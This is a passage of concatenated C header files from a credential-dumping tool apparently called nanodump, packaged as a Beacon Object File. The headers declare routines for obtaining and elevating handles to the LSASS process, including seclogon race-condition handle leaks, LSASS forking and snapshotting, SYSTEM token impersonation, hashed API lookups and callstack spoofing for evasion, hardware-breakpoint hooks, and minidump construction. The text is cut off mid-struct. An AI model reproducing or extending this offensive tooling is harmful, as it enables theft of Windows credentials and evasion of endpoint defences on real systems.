PVOID get_function_address(
    IN HMODULE hLibrary,
    IN DWORD fhash,
    IN WORD ordinal);

HANDLE get_library_address(
    IN LPWSTR lib_path,
    IN BOOL DoLoad);



================================================
FILE: Creds-BOF/nanodump/include/entry.h
================================================
#pragma once

#if defined(NANO) && defined(PPL_DUMP)

#include <windows.h>

#define UNUSED(x) (void)(x)

typedef LPWSTR*(WINAPI* CommandLineToArgvW_t) (LPCWSTR lpCmdLine, int *pNumArgs);
typedef LPWSTR(WINAPI* GetCommandLineW_t) (VOID);

#define CommandLineToArgvW_SW2_HASH 0xFF4DDE07
#define GetCommandLineW_SW2_HASH 0x6507A19C

//
// SspiCli.dll
//
__declspec(dllexport) void APIENTRY LogonUserExExW(VOID);

//
// EventAggregation.dll
//
__declspec(dllexport) void APIENTRY BriCreateBrokeredEvent(VOID);
__declspec(dllexport) void APIENTRY BriDeleteBrokeredEvent(VOID);
__declspec(dllexport) void APIENTRY EaCreateAggregatedEvent(VOID);
__declspec(dllexport) void APIENTRY EACreateAggregateEvent(VOID);
__declspec(dllexport) void APIENTRY EaQueryAggregatedEventParameters(VOID);
__declspec(dllexport) void APIENTRY EAQueryAggregateEventData(VOID);
__declspec(dllexport) void APIENTRY EaFreeAggregatedEventParameters(VOID);
__declspec(dllexport) void APIENTRY EaDeleteAggregatedEvent(VOID);
__declspec(dllexport) void APIENTRY EADeleteAggregateEvent(VOID);

#endif


================================================
FILE: Creds-BOF/nanodump/include/handle.h
================================================
#pragma once

#if (defined(NANO) || defined(PPL_MEDIC)) && !defined(SSP)

#include <windows.h>
#include <winternl.h>

#include "utils.h"
#include "dinvoke.h"

typedef DWORD(WINAPI* PssNtCaptureSnapshot_t) (PHANDLE SnapshotHandle, HANDLE ProcessHandle, DWORD CaptureFlags, DWORD ThreadContextFlags);
typedef DWORD(WINAPI* PssNtQuerySnapshot_t) (HANDLE SnapshotHandle, DWORD InformationClass, PVOID Buffer, DWORD BufferLength);
typedef DWORD(WINAPI* PssNtFreeSnapshot_t) (HANDLE SnapshotHandle);

#define PssNtCaptureSnapshot_SW2_HASH 0xE54FFDDB
#define PssNtQuerySnapshot_SW2_HASH 0x568E92DE
#define PssNtFreeSnapshot_SW2_HASH 0x248F0BD4

#define LSASS_EXE L"lsass.exe"
#define PROCESS_HANDLE_TYPE L"Process"
#define TOKEN_HANDLE_TYPE L"Token"
#define DIRECTORY_HANDLE_TYPE L"Directory"

#define MAX_PROCESSES 5000

#define RtlOffsetToPointer(B,O)  ((PCHAR)( ((PCHAR)(B)) + ((ULONG_PTR)(O))  ))

#ifndef ALIGN_UP_TYPE
#define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1))
#endif

#ifndef ALIGN_UP
#define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type))
#endif

#define ObjectTypesInformation 3

#define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\
    RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR))

#define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\
    RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \
    ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR))

typedef struct _OBJECT_TYPES_INFORMATION {
    ULONG NumberOfTypes;
} OBJECT_TYPES_INFORMATION, * POBJECT_TYPES_INFORMATION;

typedef struct _OBJECT_TYPE_INFORMATION_V2 {
    UNICODE_STRING TypeName;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG TotalPagedPoolUsage;
    ULONG TotalNonPagedPoolUsage;
    ULONG TotalNamePoolUsage;
    ULONG TotalHandleTableUsage;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    ULONG HighWaterPagedPoolUsage;
    ULONG HighWaterNonPagedPoolUsage;
    ULONG HighWaterNamePoolUsage;
    ULONG HighWaterHandleTableUsage;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    UCHAR TypeIndex;
    CHAR ReservedByte;
    ULONG PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
} OBJECT_TYPE_INFORMATION_V2, * POBJECT_TYPE_INFORMATION_V2;

#if defined(_MSC_VER)

typedef enum _POOL_TYPE
{
    NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed,
    DontUseThisType,
    NonPagedPoolCacheAligned,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS
} POOL_TYPE, *PPOOL_TYPE;

typedef struct _OBJECT_TYPE_INFORMATION
{
    UNICODE_STRING Name;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG TotalPagedPoolUsage;
    ULONG TotalNonPagedPoolUsage;
    ULONG TotalNamePoolUsage;
    ULONG TotalHandleTableUsage;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    ULONG HighWaterPagedPoolUsage;
    ULONG HighWaterNonPagedPoolUsage;
    ULONG HighWaterNamePoolUsage;
    ULONG HighWaterHandleTableUsage;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccess;
    BOOLEAN SecurityRequired;
    BOOLEAN MaintainHandleCount;
    USHORT MaintainTypeList;
    POOL_TYPE PoolType;
    ULONG PagedPoolUsage;
    ULONG NonPagedPoolUsage;
} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;

typedef struct _SYSTEM_HANDLE
{
    ULONG ProcessId;
    BYTE ObjectTypeNumber;
    BYTE Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG Count;
    SYSTEM_HANDLE Handle[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

#endif

typedef struct _PROCESS_LIST
{
    ULONG Count;
    ULONG ProcessId[MAX_PROCESSES];
} PROCESS_LIST, *PPROCESS_LIST;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

#define MAX_HANDLES 10000

typedef struct _HANDLE_LIST
{
    ULONG Count;
    HANDLE Handle[MAX_HANDLES];
} HANDLE_LIST, *PHANDLE_LIST;

BOOL find_token_handles_in_process(
    IN DWORD process_pid,
    IN DWORD permissions,
    OUT PHANDLE_LIST* phandle_list);

BOOL find_process_handles_in_process(
    IN DWORD process_pid,
    IN DWORD permissions,
    OUT PHANDLE_LIST* phandle_list);

BOOL find_directory_handles_in_process(
    IN DWORD process_pid,
    IN DWORD permissions,
    OUT PHANDLE_LIST* phandle_list);

BOOL check_handle_privs(
    IN HANDLE handle,
    IN DWORD permissions);

HANDLE elevate_handle_via_duplicate(
    IN HANDLE hProcess,
    IN ACCESS_MASK DesiredAccess,
    IN DWORD HandleAttributes);

HANDLE make_handle_full_access(
    IN HANDLE hProcess,
    IN DWORD attributes);

DWORD get_lsass_min_permissions(VOID);

DWORD get_lsass_clone_permissions(VOID);

DWORD get_lsass_shtinkering_permissions(VOID);

BOOL obtain_lsass_handle(
    OUT PHANDLE phProcess,
    IN DWORD lsass_pid,
    IN BOOL duplicate_handle,
    IN BOOL elevate_handle,
    IN BOOL duplicate_elevate,
    IN BOOL use_seclogon_duplicate,
    IN BOOL spoof_callstack,
    IN BOOL is_seclogon_leak_local_stage_2,
    IN LPCSTR seclogon_leak_remote_binary,
    OUT PPROCESS_LIST* Pcreated_processes,
    IN BOOL use_valid_sig,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    OUT PHANDLE PhSnapshot,
    IN BOOL use_seclogon_leak_local,
    IN BOOL use_seclogon_leak_remote,
    IN BOOL use_lsass_shtinkering);

HANDLE open_handle_to_lsass(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN BOOL dup,
    IN BOOL seclogon_race,
    IN BOOL spoof_callstack,
    IN BOOL is_malseclogon_stage_2,
    IN DWORD attributes);

HANDLE find_lsass(
    IN DWORD dwFlags,
    IN DWORD attributes);

HANDLE get_process_handle(
    IN DWORD dwPid,
    IN DWORD dwFlags,
    IN BOOL quiet,
    IN DWORD attributes);

BOOL get_all_handles(
    OUT PSYSTEM_HANDLE_INFORMATION* phandle_table,
    OUT PULONG phandle_table_size);

BOOL process_is_included(
    IN PPROCESS_LIST process_list,
    IN ULONG ProcessId);

BOOL get_processes_from_handle_table(
    IN PSYSTEM_HANDLE_INFORMATION handleTableInformation,
    OUT PPROCESS_LIST* pprocess_list);

BOOL query_object_types_info(
    POBJECT_TYPES_INFORMATION* pObjectTypes,
    PULONG pObjectTypesSize);

BOOL get_type_index_by_name(
    IN LPWSTR handle_type,
    OUT PULONG ProcesTypeIndex);

HANDLE duplicate_lsass_handle(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN DWORD attributes);

HANDLE fork_process(
    IN HANDLE hProcess,
    IN DWORD attributes);

HANDLE snapshot_process(
    IN HANDLE hProcess,
    OUT PHANDLE hSnapshot);

BOOL free_snapshot(
    IN HANDLE hSnapshot);

#endif


================================================
FILE: Creds-BOF/nanodump/include/hw_breakpoint.h
================================================

#include <windows.h>

#include "dinvoke.h"
#include "output.h"
#include "ntdefs.h"

#define DEBUG_REGISTER_INDEX 0
//#define DEBUG_REGISTER_INDEX 1
//#define DEBUG_REGISTER_INDEX 2
//#define DEBUG_REGISTER_INDEX 3

typedef PVOID(WINAPI* RtlAddVectoredExceptionHandler_t) (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
typedef ULONG(WINAPI* RtlRemoveVectoredExceptionHandler_t) (PVOID Handle);

#define RtlAddVectoredExceptionHandler_SW2_HASH 0xA79DB11D
#define RtlRemoveVectoredExceptionHandler_SW2_HASH 0x24380EA3

#if defined(__clang__)
 #define SET_SYNTAX ".intel_syntax noprefix \n"
#else
 #define SET_SYNTAX
#endif

ULONG_PTR set_bits(
    ULONG_PTR dw,
    int lowBit,
    int bits,
    ULONG_PTR newValue);

VOID clear_breakpoint(
    CONTEXT* ctx,
    int index);

VOID enable_breakpoint(
    CONTEXT* ctx,
    PVOID address,
    int index);

LONG hwbp_handler(
    PEXCEPTION_POINTERS exceptions);

BOOL set_hwbp(
    PVOID address,
    PHANDLE phHwBpHandler);

VOID unset_hwbp(
    HANDLE hHwBpHandler);


================================================
FILE: Creds-BOF/nanodump/include/impersonate.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "dinvoke.h"
#include "syscalls.h"

#ifndef ThreadImpersonationToken
 #define ThreadImpersonationToken 5
#endif

typedef BOOL(WINAPI* ConvertStringSidToSidW_t) (LPCWSTR StringSid, PSID *Sid);
typedef BOOL(WINAPI* CopySid_t) (DWORD nDestinationSidLength, PSID pDestinationSid, PSID pSourceSid);
typedef BOOL(WINAPI* ConvertSidToStringSidW_t) (PSID Sid, LPWSTR *StringSid);
typedef BOOL(WINAPI* LookupAccountSidW_t) (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
typedef BOOL(WINAPI* RevertToSelf_t) (VOID);

#define ConvertStringSidToSidW_SW2_HASH 0x9A0697A4
#define CopySid_SW2_HASH 0xE9DEE47F
#define ConvertSidToStringSidW_SW2_HASH 0x2E89B34F
#define LookupAccountSidW_SW2_HASH 0x093E752B
#define RevertToSelf_SW2_HASH 0x93BC9622

BOOL impersonate_user(
    IN LPCWSTR pwszSid,
    OUT PHANDLE phToken,
    IN LPCWSTR pwszPrivileges[],
    IN DWORD dwPrivilegeCount);

BOOL impersonate(
    IN HANDLE hToken);

BOOL find_process_token_and_duplicate(
    IN LPCWSTR pwszTargetSid,
    IN LPCWSTR pwszPrivileges[],
    IN DWORD dwPrivilegeCount,
    OUT PHANDLE phToken);

BOOL revert_to_self(VOID);

BOOL impersonate_process(
    IN DWORD process_id,
    OUT PHANDLE phProcessToken);

BOOL impersonate_system(
    OUT PHANDLE phSystemToken);

BOOL impersonate_local_service(
    OUT PHANDLE phLocalServiceToken);

BOOL token_get_sid(
    IN HANDLE hToken,
    OUT PSID* ppSid);

BOOL token_get_sid_as_string(
    IN HANDLE hToken,
    OUT LPWSTR* ppwszStringSid);

BOOL is_current_user_system(
    OUT PBOOL pbResult);

BOOL token_compare_sids(
    IN PSID pSidA,
    IN PSID pSidB);

BOOL token_is_not_restricted(
    IN HANDLE hToken,
    OUT PBOOL pbIsNotRestricted);

BOOL token_get_username(
    IN HANDLE hToken,
    OUT LPWSTR* ppwszUsername);


================================================
FILE: Creds-BOF/nanodump/include/malseclogon.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "nanodump.h"
#include "handle.h"
#include "dinvoke.h"

#if defined(NANO) && !defined(SSP) && !defined(PPL_DUMP) && !defined(PPL_MEDIC)

#ifndef CTL_CODE

#define CTL_CODE( DeviceType, Function, Method, Access ) (                 \
    ((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)

#endif /* CTL_CODE */

#ifndef REQUEST_OPLOCK_CURRENT_VERSION

#define REQUEST_OPLOCK_CURRENT_VERSION 1

typedef struct _REQUEST_OPLOCK_INPUT_BUFFER {
  USHORT StructureVersion;
  USHORT StructureLength;
  ULONG RequestedOplockLevel;
  ULONG Flags;
} REQUEST_OPLOCK_INPUT_BUFFER, *PREQUEST_OPLOCK_INPUT_BUFFER;

typedef struct _REQUEST_OPLOCK_OUTPUT_BUFFER {
  USHORT StructureVersion;
  USHORT StructureLength;
  ULONG OriginalOplockLevel;
  ULONG NewOplockLevel;
  ULONG Flags;
  ACCESS_MASK AccessMode;
  USHORT ShareMode;
} REQUEST_OPLOCK_OUTPUT_BUFFER, *PREQUEST_OPLOCK_OUTPUT_BUFFER;

#endif /* REQUEST_OPLOCK_CURRENT_VERSION */

#ifndef OPLOCK_LEVEL_CACHE_READ
#define OPLOCK_LEVEL_CACHE_READ         (0x00000001)
#endif
#ifndef OPLOCK_LEVEL_CACHE_HANDLE
#define OPLOCK_LEVEL_CACHE_HANDLE       (0x00000002)
#endif
#ifndef OPLOCK_LEVEL_CACHE_WRITE
#define OPLOCK_LEVEL_CACHE_WRITE        (0x00000004)
#endif

#ifndef REQUEST_OPLOCK_INPUT_FLAG_REQUEST
#define REQUEST_OPLOCK_INPUT_FLAG_REQUEST               (0x00000001)
#endif
#ifndef REQUEST_OPLOCK_INPUT_FLAG_ACK
#define REQUEST_OPLOCK_INPUT_FLAG_ACK                   (0x00000002)
#endif
#ifndef REQUEST_OPLOCK_INPUT_FLAG_COMPLETE_ACK_ON_CLOSE
#define REQUEST_OPLOCK_INPUT_FLAG_COMPLETE_ACK_ON_CLOSE (0x00000004)
#endif

#ifndef FILE_DEVICE_FILE_SYSTEM
#define FILE_DEVICE_FILE_SYSTEM           0x00000009
#endif

#ifndef METHOD_BUFFERED
#define METHOD_BUFFERED                   0
#endif

#ifndef FILE_ANY_ACCESS
#define FILE_ANY_ACCESS                   0x00000000
#endif

#ifndef FSCTL_REQUEST_OPLOCK
#define FSCTL_REQUEST_OPLOCK CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 144, METHOD_BUFFERED, FILE_ANY_ACCESS)
#endif

struct TEB
{
    struct _NT_TIB NtTib;
    VOID* EnvironmentPointer;
    struct _CLIENT_ID ClientId;
    VOID* ActiveRpcHandle;
    VOID* ThreadLocalStoragePointer;
    struct _PEB* ProcessEnvironmentBlock;
};

typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION
{
    ULONG NumberOfProcessIdsInList;
    ULONG_PTR ProcessIdList[1];
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;

typedef struct _THREAD_PARAMETERS
{
    DWORD pid;
    LPWSTR cmdline;
    PBOOL file_lock_was_triggered;
} THREAD_PARAMETERS, *PTHREAD_PARAMETERS;

#define FileProcessIdsUsingFileInformation 47

typedef BOOL(WINAPI* CreateProcessWithLogonW_t) (LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
typedef BOOL(WINAPI* CreateProcessWithTokenW_t) (HANDLE hToken, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);

#define CreateProcessWithLogonW_SW2_HASH 0x39A92305
#define CreateProcessWithTokenW_SW2_HASH 0x03A92535

VOID change_pid(
    IN DWORD new_pid,
    OUT PDWORD previous_pid);

VOID set_command_line(
    IN BOOL use_malseclogon_locally,
    IN LPWSTR command_line,
    IN LPCSTR program_name,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    IN BOOL use_valid_sig,
    IN BOOL use_lsass_shtinkering,
    IN LPWSTR synchronization_file);

BOOL save_new_process_pid(
    IN PPROCESS_LIST process_list,
    IN DWORD pid);

BOOL check_if_succeded(
    IN DWORD new_pid,
    IN LPWSTR dump_path);

VOID kill_created_processes(
    IN PPROCESS_LIST created_processes);

BOOL malseclogon_handle_leak(
    IN LPCSTR binary_path,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    IN BOOL use_valid_sig,
    IN BOOL use_lsass_shtinkering,
    IN BOOL use_malseclogon_locally,
    IN DWORD lsass_pid,
    OUT PPROCESS_LIST* Pcreated_processes);

BOOL malseclogon_stage_1(
    IN LPCSTR program_name,
    IN LPCSTR dump_path,
    IN BOOL fork_lsass,
    IN BOOL snapshot_lsass,
    IN BOOL use_valid_sig,
    IN BOOL use_lsass_shtinkering,
    IN BOOL use_malseclogon_locally,
    IN DWORD lsass_pid,
    OUT PPROCESS_LIST process_list);

VOID malseclogon_trigger_lock(
    IN DWORD lsass_pid,
    IN LPWSTR cmdline,
    IN PBOOL file_lock_was_triggered);

DWORD WINAPI thread_seclogon_lock(
    IN LPVOID lpParam);

BOOL leak_lsass_handle_in_seclogon_with_race_condition(
    IN DWORD lsass_pid,
    OUT PHANDLE hEvent,
    OUT PHANDLE hFile);

DWORD get_pid_using_file_path(
    IN LPWSTR file_path);

DWORD get_seclogon_pid(VOID);

HANDLE malseclogon_race_condition(
    IN DWORD lsass_pid,
    IN DWORD permissions,
    IN DWORD attributes);

#ifdef EXE
HANDLE malseclogon_stage_2(VOID);
#endif

#endif


================================================
FILE: Creds-BOF/nanodump/include/modules.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "output.h"
#include "syscalls.h"
#include "ntdefs.h"
#include "utils.h"

#define UNUSED(x) (void)(x)

#define LSASRV_DLL L"lsasrv.dll"
#ifdef _WIN64
#define LDR_POINTER_OFFSET 0x18
#define MODULE_LIST_POINTER_OFFSET 0x10
#else
#define LDR_POINTER_OFFSET 0xc
#define MODULE_LIST_POINTER_OFFSET 0xc
#endif

typedef struct _module_info
{
    struct _module_info* next;
    ULONG64 dll_base;
    ULONG32 size_of_image;
    char dll_name[512];
    ULONG32 name_rva;
    ULONG32 TimeDateStamp;
    ULONG32 CheckSum;
} module_info, *Pmodule_info;

PVOID get_peb_address(
    IN HANDLE hProcess);

PVOID get_module_list_address(
    IN HANDLE hProcess,
    IN BOOL is_lsass);

Pmodule_info add_new_module(
    IN HANDLE hProcess,
    IN struct LDR_DATA_TABLE_ENTRY* ldr_entry);

BOOL read_ldr_entry(
    IN HANDLE hProcess,
    IN PVOID ldr_entry_address,
    OUT struct LDR_DATA_TABLE_ENTRY* ldr_entry,
    OUT wchar_t* base_dll_name);

Pmodule_info find_modules(
    IN HANDLE hProcess,
    IN wchar_t* important_modules[],
    IN int number_of_important_modules,
    IN BOOL is_lsass);


================================================
FILE: Creds-BOF/nanodump/include/nanodump.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>
#include <time.h>
#include <string.h>
#include <memory.h>

#if defined(EXE) || defined(DLL)
 #define PE
#endif

#ifndef BOF
#include "beacon.h"
#include "adaptix.h"
#include "output.h"
#include "ntdefs.h"
#include "utils.h"
#include "handle.h"
#include "modules.h"
#include "syscalls.h"
#include "token_priv.h"
#include "malseclogon.h"
#include "werfault.h"
#include "impersonate.h"
#include "spoof_callstack.h"
#include "shtinkering.h"
#endif

// amount of memory requested to write the dump: 200 MiB
#define DUMP_MAX_SIZE 0x0c800000

// fake credentials used by MalSecLogon
#define NANODUMP_USER   L"NanoDumpUser"
#define NANODUMP_DOMAIN L"NanoDumpDomain"
#define NANODUMP_PASSWD L"NanoDumpPwd"

// change to remove the "LSASS" string from the binaries
#define LSASS "LSASS"

// permissions requested by PssNtCaptureSnapshot
#define PROCESS_PPSCAPTURESNAPSHOT_PERMISSIONS PSS_CAPTURE_VA_CLONE
#define THREAD_PPSCAPTURESNAPSHOT_PERMISSIONS 0

#if _WIN64
 #define PROCESS_PARAMETERS_OFFSET 0x20
 #define OSMAJORVERSION_OFFSET 0x118
 #define OSMINORVERSION_OFFSET 0x11c
 #define OSBUILDNUMBER_OFFSET 0x120
 #define OSPLATFORMID_OFFSET 0x124
 #define CSDVERSION_OFFSET 0x2e8
 #define PROCESSOR_ARCHITECTURE AMD64
#else
 #define PROCESS_PARAMETERS_OFFSET 0x10
 #define OSMAJORVERSION_OFFSET 0xa4
 #define OSMINORVERSION_OFFSET 0xa8
 #define OSBUILDNUMBER_OFFSET 0xac
 #define OSPLATFORMID_OFFSET 0xb0
 #define CSDVERSION_OFFSET 0x1f0
 #define PROCESSOR_ARCHITECTURE INTEL
#endif

#define ARRAY_SIZE(a) (sizeof(a)/sizeof((a)[0]))

#define SystemHandleInformation 0x10
#define ObjectTypeInformation 2

#define CALLBACK_FILE       0x02
#define CALLBACK_FILE_WRITE 0x08
#define CALLBACK_FILE_CLOSE 0x09

#ifndef MEM_COMMIT
 #define MEM_COMMIT 0x1000
#endif
#ifndef MEM_MAPPED
 #define MEM_MAPPED 0x40000
#endif
#ifndef MEM_IMAGE
 #define MEM_IMAGE 0x1000000
#endif
#define PAGE_NOACCESS 0x01
#define PAGE_GUARD 0x100

#ifdef BOF
 WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(VOID);
 WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
 WINBASEAPI BOOL   WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
 WINBASEAPI DWORD  WINAPI KERNEL32$GetLastError (VOID);
 WINBASEAPI HLOCAL WINAPI KERNEL32$LocalAlloc(UINT uFlags, SIZE_T uBytes);
 WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem);

 WINBASEAPI wchar_t * __cdecl MSVCRT$wcsstr(const wchar_t *_Str,const wchar_t *_SubStr);
 WINBASEAPI char *    __cdecl MSVCRT$strrchr(const char *_Str,int _Ch);
 WINBASEAPI void *    __cdecl MSVCRT$memcpy(void * _Dst,const void * _Src,size_t _MaxCount);
 WINBASEAPI int       __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size);
 WINBASEAPI size_t    __cdecl MSVCRT$strnlen(const char *s, size_t maxlen);
 WINBASEAPI size_t    __cdecl MSVCRT$wcsnlen(const wchar_t *_Src,size_t _MaxCount);
 WINBASEAPI wchar_t * __cdecl MSVCRT$wcsncpy(wchar_t * ,const wchar_t * ,size_t);
 WINBASEAPI size_t    __cdecl MSVCRT$mbstowcs(wchar_t * _Dest,const char * _Source,size_t _MaxCount);
 WINBASEAPI size_t    __cdecl MSVCRT$wcstombs(char * _Dest,const wchar_t * _Source,size_t _MaxCount);
 WINBASEAPI wchar_t * __cdecl MSVCRT$wcsncat(wchar_t * _Dest,const wchar_t * _Source,size_t _Count);
 WINBASEAPI int       __cdecl MSVCRT$strncmp(const char *s1, const char *s2, size_t n);
 WINBASEAPI int       __cdecl MSVCRT$strcmp(const char *s1, const char *s2);
 WINBASEAPI int       __cdecl MSVCRT$wcscmp(const wchar_t *_Str1, const wchar_t *_Str2);
 WINBASEAPI int       __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1,const wchar_t *_Str2);
 WINBASEAPI void      __cdecl MSVCRT$srand(int initial);
 WINBASEAPI int       __cdecl MSVCRT$rand();
 WINBASEAPI time_t    __cdecl MSVCRT$time(time_t *time);
 WINBASEAPI void      __cdecl MSVCRT$memset(void *dest, int c, size_t count);
 WINBASEAPI size_t    __cdecl MSVCRT$strlen(const char *s);
 WINBASEAPI char *    __cdecl MSVCRT$strncpy(char * __dst, const char * __src, size_t __n);
 WINBASEAPI char *    __cdecl MSVCRT$strncat(char * _Dest,const char * _Source, size_t __n);
 WINBASEAPI int       __cdecl MSVCRT$_vscprintf(const char *format, va_list argptr);
 WINBASEAPI int       __cdecl MSVCRT$vsprintf_s(char *_DstBuf,size_t _Size,const char *_Format,va_list _ArgList);
 WINBASEAPI size_t    __cdecl MSVCRT$wcslen(const wchar_t *_Str);
 WINBASEAPI int       __cdecl MSVCRT$sprintf_s(char *_DstBuf, size_t _DstSize, const char *_Format, ...);
 WINBASEAPI int       __cdecl MSVCRT$swprintf_s(wchar_t *_Dst,size_t _SizeInWords,const wchar_t *_Format,...);
 WINBASEAPI wchar_t * __cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch);

 #define GetProcessHeap   KERNEL32$GetProcessHeap
 #define HeapAlloc        KERNEL32$HeapAlloc
 #define HeapFree         KERNEL32$HeapFree
 #define GetLastError     KERNEL32$GetLastError
 #define LocalAlloc       KERNEL32$LocalAlloc
 #define LocalFree        KERNEL32$LocalFree

 #define wcsstr     MSVCRT$wcsstr
 #define strrchr    MSVCRT$strrchr
 #define memcpy     MSVCRT$memcpy
 #define memcmp     MSVCRT$memcmp
 #define strnlen    MSVCRT$strnlen
 #define wcsnlen    MSVCRT$wcsnlen
 #define wcsncpy    MSVCRT$wcsncpy
 #define mbstowcs   MSVCRT$mbstowcs
 #define wcstombs   MSVCRT$wcstombs
 #define wcsncat    MSVCRT$wcsncat
 #define strncmp    MSVCRT$strncmp
 #define strcmp     MSVCRT$strcmp
 #define wcscmp     MSVCRT$wcscmp
 #define _wcsicmp   MSVCRT$_wcsicmp
 #define srand      MSVCRT$srand
 #define rand       MSVCRT$rand
 #define time       MSVCRT$time
 #define memset     MSVCRT$memset
 #define strlen     MSVCRT$strlen
 #define strncpy    MSVCRT$strncpy
 #define strncat    MSVCRT$strncat
 #define _vscprintf MSVCRT$_vscprintf
 #define vsprintf_s MSVCRT$vsprintf_s
 #define wcslen     MSVCRT$wcslen
 #define sprintf_s  MSVCRT$sprintf_s
 #define swprintf_s MSVCRT$swprintf_s
 #define wcsrchr    MSVCRT$wcsrchr

#endif

#define MINIDUMP_SIGNATURE 0x504d444d
#define MINIDUMP_VERSION 42899
#define MINIDUMP_IMPL_VERSION 0

#define SIZE_OF_HEADER 32
#define SIZE_OF_DIRECTORY 12
#ifdef _WIN64
 #define SIZE_OF_SYSTEM_INFO_STREAM 48
#else
 #define SIZE_OF_SYSTEM_INFO_STREAM 56
#endif
#define SIZE_OF_MINIDUMP_MODULE 108

enum StreamType
{
    SystemInfoStream = 7,
    ModuleListStream = 4,
    Memory64ListStream = 9,
};

enum ProcessorArchitecture
{
    AMD64 = 9,
    INTEL = 0,
};

enum MiniDumpType
{
    MiniDumpNormal = 0,
};

typedef struct _MiniDumpHeader
{
     ULONG32       Signature;
     SHORT         Version;
     SHORT         ImplementationVersion;
     ULONG32       NumberOfStreams;
     ULONG32       StreamDirectoryRva;
     ULONG32       CheckSum;
     ULONG32       Reserved;
     ULONG32       TimeDateStamp;
     ULONG32       Flags;
} MiniDumpHeader, *PMiniDumpHeader;

typedef struct _MiniDumpDirectory
{
     ULONG32       StreamType;
     ULONG32       DataSize;
     ULONG32       Rva;
} MiniDumpDirectory, *PMiniDumpDirectory;

typedef struct _dump_context
{
    HANDLE  hProcess;
    PVOID   BaseAddress;
    ULONG32 rva;
    SIZE_T  DumpMaxSize;
    ULONG32 Signature;
    USHORT  Version;
    USHORT  ImplementationVersion;
} dump_context, *Pdump_context;

typedef struct _MiniDumpSystemInfo
{
    SHORT ProcessorArchitecture;
    SHORT ProcessorLevel;
    SHORT ProcessorRevision;
    char    NumberOfProcessors;
    char    ProductType;
    ULONG32 MajorVersion;
    ULONG32 MinorVersion;
    ULONG32 BuildNumber;
    ULONG32 PlatformId;
    ULONG32 CSDVersionRva;
    SHORT SuiteMask;
    SHORT Reserved2;
#if _WIN64
        ULONG64 ProcessorFeatures1;
        ULONG64 ProcessorFeatures2;
#else
        ULONG32 VendorId1;
        ULONG32 VendorId2;
        ULONG32 VendorId3;
        ULONG32 VersionInformation;
